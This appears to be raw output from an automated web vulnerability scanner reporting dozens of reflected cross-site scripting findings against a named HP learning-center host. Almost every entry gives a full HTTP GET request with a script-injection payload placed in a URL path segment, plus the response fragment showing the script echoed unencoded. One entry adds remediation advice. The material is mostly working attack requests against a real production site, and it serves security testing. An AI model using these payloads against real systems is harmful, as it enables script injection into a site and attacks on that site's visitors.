The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffcdd"><script>alert(1)</script>3d65e0e84c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /campusffcdd"><script>alert(1)</script>3d65e0e84c7/p/campusId/10640/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/campusffcdd"><script>alert(1)</script>3d65e0e84c7/p/campusId/10640/Graphic_arts.htm?printable=true"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 760e0"><script>alert(1)</script>07593cf9d0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /campus/p760e0"><script>alert(1)</script>07593cf9d0b/campusId/10640/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/campus/p760e0"><script>alert(1)</script>07593cf9d0b/campusId/10640/Graphic_arts.htm?printable=true"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d0f5"><script>alert(1)</script>6549be04bdf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /campus/p/campusId6d0f5"><script>alert(1)</script>6549be04bdf/10640/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47c48"><script>alert(1)</script>4211f41393e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /campus/p/campusId/1064047c48"><script>alert(1)</script>4211f41393e/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5bb3'-alert(1)-'d1d24f8133d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /campus/p/campusId/10640b5bb3'-alert(1)-'d1d24f8133d/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6113c"><script>alert(1)</script>8529132865 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /campus/p/campusId/10640/Graphic_arts.htm6113c"><script>alert(1)</script>8529132865 HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP Learning center ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm6113c"><script>alert(1)</script>8529132865?printable=true&Graphic_arts.htm6113c%22%3E%3Cscript%3Ealert%281%29%3C=script%3E8529132865&campusId=10640"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7261f"><script>alert(1)</script>4ba80ec5e10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /howto_QL_courses.jsp7261f"><script>alert(1)</script>4ba80ec5e10 HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/howto_QL_courses.jsp7261f"><script>alert(1)</script>4ba80ec5e10?printable=true"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca059"><script>alert(1)</script>af8ce681eb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.jspca059"><script>alert(1)</script>af8ce681eb5 HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/index.jspca059"><script>alert(1)</script>af8ce681eb5?printable=true"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a474"><script>alert(1)</script>54f6a1efe39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/is2a474"><script>alert(1)</script>54f6a1efe39/20e091670f/p/productId/104917/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27635"><script>alert(1)</script>89d1adfe433 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/is27635"><script>alert(1)</script>89d1adfe433/325ef8a67a/p/productId/104923/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a87dc"><script>alert(1)</script>440c3e7e92a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/isa87dc"><script>alert(1)</script>440c3e7e92a/3acb9749b2/p/productId/104920/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9d2b"><script>alert(1)</script>a7d21fbf280 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/ise9d2b"><script>alert(1)</script>a7d21fbf280/3b7457787c/p/productId/104931/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d811"><script>alert(1)</script>cbc1f160e8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/is9d811"><script>alert(1)</script>cbc1f160e8b/47780c0137/p/productId/104922/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a53d"><script>alert(1)</script>ae87372c74c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/is6a53d"><script>alert(1)</script>ae87372c74c/8ba8b30c42/p/productId/104918/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef830"><script>alert(1)</script>ce745a8cc16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/isef830"><script>alert(1)</script>ce745a8cc16/9ccd9cd181/p/productId/104924/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af1aa"><script>alert(1)</script>e7977990f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/isaf1aa"><script>alert(1)</script>e7977990f9/a5588e763b/p/productId/104931/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a3a"><script>alert(1)</script>b8cff2f5c7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/isa2a3a"><script>alert(1)</script>b8cff2f5c7a/a5e43ec55d/p/productId/104921/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e727"><script>alert(1)</script>526ec6956f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/is4e727"><script>alert(1)</script>526ec6956f6/b5c411ac2a/p/productId/104923/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18d0a"><script>alert(1)</script>829490b7dd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/is18d0a"><script>alert(1)</script>829490b7dd7/c584bdc88b/p/productId/104924/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c73a"><script>alert(1)</script>ca2e809aac9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/is7c73a"><script>alert(1)</script>ca2e809aac9/d08e5b9012/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 610a4"><script>alert(1)</script>1cb31b9e7a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/is610a4"><script>alert(1)</script>1cb31b9e7a8/ec0a3f9959/p/productId/104920/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aca59"><script>alert(1)</script>64456137cdb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/isaca59"><script>alert(1)</script>64456137cdb/f8069e08a0/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd428"><script>alert(1)</script>30a6c3b6743 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/pv.gifbd428"><script>alert(1)</script>30a6c3b6743?printable=true&u=http%3A%2F%2Fh30187.www3.hp.com%2Findex.jspca059%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Eaf8ce681eb5&s=null&nocache=1315176274807&cid=700"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6084c"><script>alert(1)</script>69270061d23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources6084c"><script>alert(1)</script>69270061d23/scripts/builder.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb48a"><script>alert(1)</script>3f76bf537ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptscb48a"><script>alert(1)</script>3f76bf537ca/builder.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41dd4"><script>alert(1)</script>b17d3fbe7e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/builder.js41dd4"><script>alert(1)</script>b17d3fbe7e4?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1f38"><script>alert(1)</script>c169c88a19c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resourcesb1f38"><script>alert(1)</script>c169c88a19c/scripts/controls.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae318"><script>alert(1)</script>97c24640801 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsae318"><script>alert(1)</script>97c24640801/controls.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2499c"><script>alert(1)</script>0bcb6abd0c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/controls.js2499c"><script>alert(1)</script>0bcb6abd0c9?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 728fa"><script>alert(1)</script>591dcd90ff0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources728fa"><script>alert(1)</script>591dcd90ff0/scripts/coremetrics/cmdatatagutils.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb23"><script>alert(1)</script>ad6b72789ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsdcb23"><script>alert(1)</script>ad6b72789ff/coremetrics/cmdatatagutils.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 706b0"><script>alert(1)</script>aeaafebd9d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics706b0"><script>alert(1)</script>aeaafebd9d9/cmdatatagutils.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb321"><script>alert(1)</script>cb8c8ea3085 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.jscb321"><script>alert(1)</script>cb8c8ea3085?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 175cc"><script>alert(1)</script>017088e4729 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources175cc"><script>alert(1)</script>017088e4729/scripts/coremetrics/v40/eluminate.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa671"><script>alert(1)</script>0c8dbad185f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsfa671"><script>alert(1)</script>0c8dbad185f/coremetrics/v40/eluminate.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47497"><script>alert(1)</script>2129490ee66 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics47497"><script>alert(1)</script>2129490ee66/v40/eluminate.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce4fd"><script>alert(1)</script>a8ac50bab5b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics/v40ce4fd"><script>alert(1)</script>a8ac50bab5b/eluminate.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35bd7"><script>alert(1)</script>6000b59c9da was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js35bd7"><script>alert(1)</script>6000b59c9da?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bd8"><script>alert(1)</script>7215cf1e60b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resourcese3bd8"><script>alert(1)</script>7215cf1e60b/scripts/dragdrop.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ab1"><script>alert(1)</script>1956d4d9dbf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts20ab1"><script>alert(1)</script>1956d4d9dbf/dragdrop.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd15a"><script>alert(1)</script>a3a4eb3735f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
